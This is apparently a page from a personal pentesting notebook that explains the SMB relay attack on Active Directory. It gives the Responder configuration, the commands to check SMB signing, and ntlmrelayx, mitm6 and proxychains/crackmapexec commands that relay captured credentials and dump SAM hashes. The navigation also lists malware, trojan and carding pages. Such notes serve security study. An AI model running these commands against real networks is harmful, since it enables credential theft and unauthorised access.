Hackzzz - The Notebook
  • ⚡Welcome!
    • 👾Hackzzz
    • 📝Writeups
      • HackTheBox
        • 🐧Linux
          • Lame
          • Squashed
          • Faculty
        • 🪟Windows
          • Jeeves
          • Bart
          • Active
          • Tally
      • Portswigger
        • 📂File upload
          • Apprentice
            • Remote code execution via web shell upload
            • Web shell upload via Content-Type restriction bypass
        • 💉SQL Injection
          • Apprentice
            • SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
            • SQL injection vulnerability allowing login bypass
          • Practioner
            • SQL injection UNION attack, determining the number of columns returned by the query
            • SQL injection UNION attack, finding a column containing text
            • SQL injection UNION attack, retrieving data from other tables
            • SQL injection UNION attack, retrieving multiple values in a single column
            • SQL injection attack, querying the database type and version on Oracle
            • SQL injection attack, querying the database type and version on MySQL and Microsoft
            • SQL injection attack, listing the database contents on non-Oracle databases
            • SQL injection attack, listing the database contents on Oracle
            • Blind SQL injection with conditional responses
            • Blind SQL injection with time delays
            • Blind SQL injection with time delays and information retrieval
        • 📑Information Disclosure
          • Apprentice
            • Error Messages
            • Filtering a debug page
            • Backup Leakage
            • Authentication bypass via information disclosure
          • Practitioner
            • Information disclosure in version control history
        • 🪜Directory Traversal
          • Apprentice
            • File path traversal, simple case
          • Practioner
            • File path traversal, traversal sequences blocked with absolute path bypass
            • File path traversal, traversal sequences stripped non-recursively
            • File path traversal, traversal sequences stripped with superfluous URL-decode
            • File path traversal, validation of file extension with null byte bypass
        • 🧑‍💻OS Command Injection
          • Apprentice
            • OS command injection, simple case
          • Practioner
            • Blind OS command injection with time delays
            • Blind OS command injection with output redirection
        • 🧃Broken Authentication
          • Apprentice
            • Username enumeration via different responses
            • 2FA simple bypass
            • Password reset broken logic
        • 🗃️Access Control
          • Apprentice
            • Unprotected admin functionality
            • Unprotected admin functionality with unpredictable URL
            • User role controlled by request parameter
            • User role can be modified in user profile
            • User ID controlled by request parameter
            • User ID controlled by request parameter, with unpredictable user IDs
            • User ID controlled by request parameter with data leakage in redirect
            • User ID controlled by request parameter with password disclosure
            • Insecure Direct Object References (IDOR)
        • 📝External Entity Injection
          • Apprentice
      • TryHackme
        • 🐧Linux
        • 🪟Windows
          • Crocc Crew
          • Enterprise
    • 🔮Github
    • 📺YouTube Channel
  • Everything About and Notes
    • 🥷Five stages of Ethical Hacking
    • 🔍OSINT
      • 🕵️Information Gathering Methodologies
        • Information Gathering
        • OSINT Employee's
        • Automate OSINT techniques
          • Sherlock
          • PhoneInfoga
          • Osintgram
          • twint
          • Userrecon
      • Discovering Email Address
      • Breach Credentials
      • Reverse Image Searching
      • Hunting Usernames & Accounts
      • Searching People
      • Phone Numbers
      • Google Dorks
      • Search Engines
      • Default Passwords
      • Aircraft Tracking
      • Car OSINT
      • Wi-Fi OSINT
      • OSINT Virtual Machine
    • 👁️Network Pentesting
      • MITM Cheatsheet
      • Host Discovery
      • Scanning Hosts
      • Sniffing
      • Spoofing
      • DNS spoofing + apache2
      • Firewall/IDS Evasion
      • 🖨️Printer Hacking
      • 👁️‍🗨️IoT Pentesting
    • 🪟Windows and Active Directory
      • Windows Basic Commands
        • Network Command's
        • Tasks
        • Computer Slow Command's
        • Bypass Windows Admin Prompt
      • Active Directory
        • AD Enumeration
        • Man-In-The-Middle Attacks
          • SMB Relay
          • LLMNR Poisoning
        • Zerologon (2020-1472)
        • Password Cracking
        • Kerberoasting
          • Kerbrute
          • ASREP Roasting
        • Post-Compromise Enumeration
          • Powerview
          • Bloodhound
            • Installing & Setting Up
            • SharpHound
            • Using BloodHound
        • Post-Compromise attacks
          • Privilege Escalation
            • Token Impersonation
            • Print Nightmare (CVE-2021-1675)
          • Pass Attacks
            • Pass the Hash
            • Pass the Password
            • GPP cPassword Attack
          • Mimikatz
            • Golden Ticket Attack
          • Dumping hashes (secretsdump)
      • Windows Privilege Escalation
        • Unquoted Path Service
        • Abusing the Golden Privileges
        • Print Spoofer
        • Print-Nightmare
        • Rogue Potato
      • Active Directory Exploitation Cheat Sheet
      • Active Directory Attacks (PayloadAllTheThings)
    • 🧠Social Engineering
      • Windows Malware
        • Generating Undetectable backdoors
        • Bypassing Anti-Virus by modifying Hex Value
        • Creating Trojans
          • Embedding malicious files in Images or PDF
          • Changing Trojans Icon
          • Spoofing file extensions
          • Microsoft Office Trojans
            • Word Macros
      • OS X Malware
        • Using Msfvenom
      • Linux Malware
        • Simple Backdoors
        • Embedding Evil Code in a Legitimate Linux Package
        • Backdooring An APK
      • Spying Software
      • Delivery methods
        • Gophish
        • Spoofing Emails
          • Setting Your Own SMTP server
        • Creating Fake Login Website
        • Manipulating URL's
      • Make attacks outside the network
        • Ngrok
      • Social Engineering
      • Social Engineering by Cristopher hadnagy
    • 🕸️Web Pentesting
      • Web Basics
      • Information Gathering - Some One-liners
      • File Upload
      • Code Execution
      • Local File Inclusion
      • SQL Injection
      • XSS (Corss-site scripting)
      • CSRF (Cross-site requests forgery)
      • Discovering Vulnerabilities using OWASP ZAP
      • CMS
        • Wpscan
      • 🕷️OWASP Testing Guide
      • 📒Bug Bounty Checklist
    • 📡Wireless Pentesting
      • Wi-Fi Network Fundamentals
        • Basic Terminologies and Concepts
      • De-authentication
      • Disassociation Packets
      • Beacon Flooding
      • Authentication Denial-Of-Service
      • SSID Probing and Bruteforcing
      • EAPOL Start and Logoff Packet Injection
      • Attacks for IEEE 802.11s mesh networks
      • WIDS Confusion
      • WEP
        • Caffe-Latte
      • WPA/WPA2 - PSK
        • Handshake Capture
        • WPA Cracking
        • Resources
      • Evil Twin Attacks
        • WifiPumpkin3
          • Creating a fake access point
          • Using captive portal attack
          • Pulp scripts
      • WI-FI Pentesting Guide
      • Wifi Hacking Using Windows CMD
    • 🔥Binary Explotation
      • Assembly for Reverse Engineering
      • Reversing
    • 🏃‍♂️Pivoting & Port-forwarding
      • Chisel
      • SSH
      • Socat
      • plink
      • sshuttle
      • Pivoting Bash Scripts
    • 📱Mobile Application Pentesting
      • Android Hacking Methodology
      • Mobile Application CheatSheet
      • Android Penetration Testing
    • 🦾Arduino
    • 🌐External Pentesting
      • External Pentesting
  • Gadgets
    • 📇Proxmark3
      • Attacking MIFARE Classic 1KB
    • 📡SDR Hacking
      • Hardware
      • Using RTL-SDR
      • DragonOS
    • 🍍WI-FI Pineapple
      • Evil Portals
  • 🚩Resources
    • 🐙Extras
      • Drone Hacking
      • Password Cracking with Rules and Munging
      • Game Hacking
      • Carding
      • Personal Security Checklist
    • 🟦Metasploit
      • Metasploit Modules
    • rc Personal Config (.bashrc && .zshrc)
    • WADCOMS
    • GTFOBins
    • LOLBAS
    • Devhints
    • Weakpass
    • Revshells
    • 📑Pentesting Reports Repo
Powered by GitBook
On this page
  • What is SMB relay?
  • Requirements
  • What is SMB Signing?
  • Check SMB Signing
  • How to perform the attack (Ipv4)
  • SMB Relay using Ipv6
  1. Everything About and Notes
  2. Windows and Active Directory
  3. Active Directory
  4. Man-In-The-Middle Attacks

SMB Relay

What is SMB relay?

SMB relay attack is just relaying those credentials you capture with responder like, in the LLMNR Poisoning but this time you authenticate with those in other machines.

Requirements

  • SMB Signing needs to be disabled on target

  • User must have elevated privileges in the machine, like local admin, domain administrator, member of, and the group etc.

What is SMB Signing?

  • SMB Signing verify the authenticity and origin of the SMB packets. Prevents SMB MiTM attacks effectively.

Check SMB Signing

  • You can use Crackmapexec and Nmap to scan the entire network for SMB signing to make much easier the job.

Crackmapexec

Use this command and see the results.

crackmapexec smb <ip-address>

Nmap

  • Nmap haves a script to verify if SMB is signed or not. Use the following command and see the results.

nmap --script=smb2-security-mode.nse -p 445,139 192.168.64.129 -Pn --open

How to perform the attack (Ipv4)

First, we need to configure the responder, just change SMB and HTTP to Off:

[Responder Core]

; Servers to start
SQL = On
SMB = Off
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WINRM = On

We do not want to respond to these protocols as we will be capturing the hash and relaying it to a different tool called ntlmrelayx.py from Impacket.

Starting responder

sudo python Responder.py -I eth0 -v

Later than, call ntlmrelayx.py:

sudo python ntlmrelayx.py -t 192.168.1.11 -smb2support

SMB Relay using Ipv6

  • mitm6 -d domain-name.local
ntlmrelayx.py -6 -wh <target-ip> -t smb://<target-ip> -socks -debug -smb2support

# Once you have credentials with a TRUE status use proxychains to relay the credentials.

proxychains cme smb <target-ip> -u <User> -p 'whateveryouwant' -d 'domaincorp' --sam 2>/dev/null

PreviousMan-In-The-Middle AttacksNextLLMNR Poisoning

Last updated 2 years ago

🪟